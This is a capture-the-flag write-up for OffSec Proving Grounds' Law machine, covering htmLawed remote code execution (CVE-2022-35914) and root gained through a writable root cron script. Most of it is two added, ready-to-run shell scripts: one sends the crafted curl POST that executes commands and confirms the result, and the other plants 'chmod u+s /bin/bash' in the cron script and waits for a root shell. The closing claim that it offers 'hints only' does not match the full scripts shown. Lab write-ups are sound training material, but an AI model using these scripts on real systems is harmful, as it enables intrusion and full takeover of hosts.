Law Proving Grounds Write-Up
SUMMARY
This write-up covers the Law machine from OffSec's Proving Grounds, a Linux host on which the test page bundled with an HTML sanitization library (htmLawed) exposed remote code execution.
Port 80 served htmLawed 1.2.5, and searchsploit listed an RCE exploit for it. The stock exploit script failed against this host, but the public PoC for CVE-2022-35914 showed the request shape that works: a crafted POST sent with curl that makes the test page pass user input to a PHP function as a hook callback, so the submitted text is executed as a command. Once a test command confirmed execution, a reverse shell was caught as www-data.
Privilege escalation came from pspy64, which showed a script being executed by root on a cron schedule. Checking the script's permissions showed it was owned by www-data and writable, so a line setting the SUID bit on /bin/bash was appended. After the cron job fired, bash -p (the -p flag is what stops bash from dropping the setuid effective uid back to the real uid) spawned a root shell.
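As an added illustration of the request shape the public PoC uses (this is not code from the write-up or from the PoC author), the snippet below wraps it in a shell function and adds the check a practitioner wants before going further: that the response really contains command output for the web server's account. The page path /htmLawedTest.php, the sid value "foo", and the claim that hhook selects the PHP function used as the htmLawed hook are assumptions taken from the public PoC, not from this write-up.

```shell
#!/bin/sh
# Added example: htmLawed test-page command execution, CVE-2022-35914 style.
# Assumptions (from the public PoC, not from the write-up): the page sits at
# /htmLawedTest.php, the POST field 'sid' must equal a cookie named 'sid',
# 'hhook' names a PHP function used as the htmLawed hook callback, and 'text'
# is the string that function receives. With hhook=exec, 'text' runs as a
# shell command on the target.

# Build the curl request for a command. With DRY_RUN set, print the exact
# invocation instead of sending it; otherwise send it and emit the response.
htmlawed_rce() {
    target="$1"
    cmd="$2"
    # -b supplies the cookie half of the sid check, -d the POST half.
    set -- -s \
        -b 'sid=foo' \
        -d 'sid=foo' \
        -d 'hhook=exec' \
        --data-urlencode "text=$cmd" \
        "${target%/}/htmLawedTest.php"
    if [ -n "${DRY_RUN:-}" ]; then
        printf 'curl %s\n' "$*"
    else
        curl "$@"
    fi
}

# Execution is confirmed only when the response carries uid=NNN(name) output
# from the command, which for this box should name www-data.
confirm_rce() {
    printf '%s' "$1" | grep -Eq 'uid=[0-9]+\([a-z_][a-z0-9_-]*\)'
}

# Usage (not run here):
#   DRY_RUN=1 htmlawed_rce http://TARGET id
#   resp=$(htmlawed_rce http://TARGET id) && confirm_rce "$resp" && echo "RCE confirmed"
```

The dry-run path exists so the request can be inspected (or replayed through a proxy) before it is sent; confirm_rce deliberately matches the id(1) output pattern rather than a bare "www-data" string, so a page that merely echoes the input does not count as execution.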
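The cron check and the SUID payload described above, written out as an added example (not the write-up's own commands). It assumes the script path is taken by hand from pspy64 output and that the cron entry runs it as root, which is exactly the situation the page describes.

```shell
#!/bin/sh
# Added example: verify a cron-run script is writable, plant the SUID-bash
# payload, and wait for cron to apply it. Assumptions: the script path comes
# from pspy64 output and the job that runs it executes as root.

# Report owner and mode of the script and whether the current user can write
# it. Returns 0 only when writable, 1 when read-only, 2 when it is missing.
check_cron_script() {
    script="$1"
    [ -f "$script" ] || { echo "missing: $script" >&2; return 2; }
    # ls -l fields: mode, links, owner, group, ...
    printf '%s ' "$(ls -l "$script" | awk '{print "owner=" $3, "mode=" $1}')"
    if [ -w "$script" ]; then
        echo writable
        return 0
    fi
    echo read-only
    return 1
}

# Append the payload once. Because cron runs the script as root, this line
# makes /bin/bash setuid-root the next time the job fires.
plant_suid_payload() {
    script="$1"
    grep -qx 'chmod u+s /bin/bash' "$script" && return 0
    printf '\nchmod u+s /bin/bash\n' >> "$script"
}

# Poll for the setuid bit on /bin/bash; how long this takes depends on the
# cron interval seen in pspy64. Returns 0 once the bit is set.
wait_for_suid() {
    tries="${1:-120}"
    while [ "$tries" -gt 0 ]; do
        [ -u /bin/bash ] && return 0
        sleep 1
        tries=$((tries - 1))
    done
    return 1
}

# Usage (not run here):
#   check_cron_script /path/from/pspy.sh && plant_suid_payload /path/from/pspy.sh
#   wait_for_suid && /bin/bash -p      # -p keeps euid 0 instead of dropping it
```

The grep guard keeps the payload idempotent if the function is re-run while waiting; bash -p is spelled out in the usage line because without -p bash resets its effective uid to the real uid and the setuid bit buys nothing.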
PATH TO FOLLOW
- Reconnaissance & htmLawed Discovery on Port 80
- CVE-2022-35914 RCE via Crafted curl Request
- Reverse Shell as www-data
- Cronjob Discovery via pspy64
- Writable Root Script Modification → /bin/bash SUID
- Shell as Root via bash -p
Due to OffSec's policy on content sharing, these write-ups will provide hints only rather than full solutions. I know, boring stuff.